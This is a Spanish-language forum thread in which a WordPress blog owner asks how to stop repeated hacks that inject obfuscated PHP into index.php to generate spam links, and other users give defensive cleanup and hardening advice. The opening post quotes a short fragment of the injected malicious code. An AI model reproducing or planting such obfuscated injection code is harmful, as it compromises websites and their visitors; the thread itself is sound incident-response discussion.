Cómo detener hackeos constantes en blog Wordpress

NoLimits · 2016-08-26T08:08:52-0500

Hola amigos,

Durante la ultima semana mi blog ha sido victima de constantes hackeos. Ya descubrí qué es lo que hacen pero no sé como evitarlo.

Modifican el archivo index.php añadiendo algo así:

Insertar CODE, HTML o PHP:

<?php
$f8de0e = "5c098e1a2f8de0e1eb6618748fee7214";
header('Content-Type:text/html; charset=utf-8');
$O0__0O_O0O='oenme8776';
$OO0O0__0_O=14683;
$O0O0__O0_O='index.php/BC/Sy65Jk/D-YnJ6xHR_hqrxq_eskghre_ntpnumv.gn.jj';
$O___OO000O=1;
$O0_0O_OO0_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");

Son cientos de líneas las que agregan y Google empieza a detectar miles de enlaces basura por lo que tengo que estar revisando y para solucionarlo reinstalo wordpress pero al poco tiempo vuelven a modificar el archivo.

Ya instale WP Security, modifique el archivo .htaccess, ajuste los permisos de escritura, cambie contraseñas. No sé que más puedo hacer y por eso acudo a ustedes esperando que puedan ayudarme. 😕

Saludos

ramonjosegn · 2016-08-26T08:12:10-0500

Hola [MENTION=4446]NoLimits[/MENTION]

Te recomiendo cambiar de hosting. Además pon al hosting al tanto de este problema y que bloqueen el acceso de esa IP (pero pueden ser varias).

También te recomiendo cambiar contraseñas, ocultar el enlace de ingreso al login (incluso eliminarlo si lo crees necesario).

Revisa que themes y plugins estén actualizados y que no estés usando nada no comprado legalmente.

Cambia el plugin de protección por Wordfence y déjalo por ahora en modo "estoy recbiendo un ataque" para que el cortafuegos sea más agresivo.

También puedes probar con Incapsula o CloudFlare (tienen opciones gratis).

- - - Actualizado - - -

Este plugin es nuevo y creará una nueva dirección para el login con 2 palabras clave y además desactivará XMLRPC que es conocido por ser algo vulnerable (se usa para enviar pings y otras comunicaciones que ya nadie usa hoy día).

WP Login Door — WordPress Plugins
https://wordpress.org/plugins/wp-login-door/

Enrique J Ros · 2016-08-26T09:00:45-0500

Yo añadiría: usa Wordfence para comprobar qué archivos han cambiado respecto a los del repositorio y usa Sucuri para una limpieza post-hackeo. En este artículo explico el proceso estándar a seguir después de un hackeo en WordPress: Recuperar un WordPress hackeado - Enrique J. Ros

NoLimits · 2016-08-26T23:07:36-0500

ramonjosegn dijo:
Hola [MENTION=4446]NoLimits[/MENTION]

Te recomiendo cambiar de hosting. Además pon al hosting al tanto de este problema y que bloqueen el acceso de esa IP (pero pueden ser varias).

También te recomiendo cambiar contraseñas, ocultar el enlace de ingreso al login (incluso eliminarlo si lo crees necesario).

Revisa que themes y plugins estén actualizados y que no estés usando nada no comprado legalmente.

Cambia el plugin de protección por Wordfence y déjalo por ahora en modo "estoy recbiendo un ataque" para que el cortafuegos sea más agresivo.

También puedes probar con Incapsula o CloudFlare (tienen opciones gratis).

- - - Actualizado - - -

Este plugin es nuevo y creará una nueva dirección para el login con 2 palabras clave y además desactivará XMLRPC que es conocido por ser algo vulnerable (se usa para enviar pings y otras comunicaciones que ya nadie usa hoy día).

WP Login Door — WordPress Plugins
https://wordpress.org/plugins/wp-login-door/

Enrique J Ros dijo:
Yo añadiría: usa Wordfence para comprobar qué archivos han cambiado respecto a los del repositorio y usa Sucuri para una limpieza post-hackeo. En este artículo explico el proceso estándar a seguir después de un hackeo en WordPress: Recuperar un WordPress hackeado - Enrique J. Ros

Muchas gracias a ambos por la recomendación, instale el plugin Wordfence y realice un análisis con el cual logre encontrar un archivo php escondido dentro del directorio /js :s el cual tenia código malicioso.

Ahora que lo eliminé, todo va bien 😛7:

Saludos :encouragement:

Usuario eliminado 8086 · 2016-08-26T23:10:14-0500

Recomiendo que contrates un programador que te re instale el Wordpress y te revise por donde entraron y te parchee el bug.

Saludos

Gonzbort · 2016-08-26T23:18:59-0500

Saludos, te recomiendo que cambies de Host, ya que podrías ser víctima de algún Shell inyectado en el, así te evitas problemas futuros.

Usuario eliminado 8086 · 2016-08-27T09:49:59-0500

Lo más probable es que no sea el host, la mayoría de las veces es una vulnerabilidad de un script tuyo. Y cuando te la explotaron te instalaron puertas traseras

Saludos

jgm302 · 2016-08-27T10:11:47-0500

Si tienes acceso a la consola te recomiendo que ejecutes los comandos que salen en este post para ver si estas enviando mucho correo de spam desde tu wordpress
Como evitar que nuestro wodpress envie correos de spam | Webnivel
Si puedes también indicanos que panel o como tienes configurado el servidor, este tipo de hackeos los he tenido por un plugin con un bug pero algunos paneles o configuraciones son menos propensas.
Por lo que veo en tu código y unido al otro que encontraste están ejecutando código a través del metodo POST, lo que puedes hacer es mediante el archivo htaccess bloquearlo y así nadie podrá loguearse ni ejecutar código (ni si quiera tu) pero la web seguirá funcionando.

Cómo detener hackeos constantes en blog Wordpress

NoLimits

ramonjosegn

Enrique J Ros

NoLimits

Usuario eliminado 8086

Gonzbort

Usuario eliminado 8086

jgm302

Temas similares

Privacidad y transparencia

Privacidad y transparencia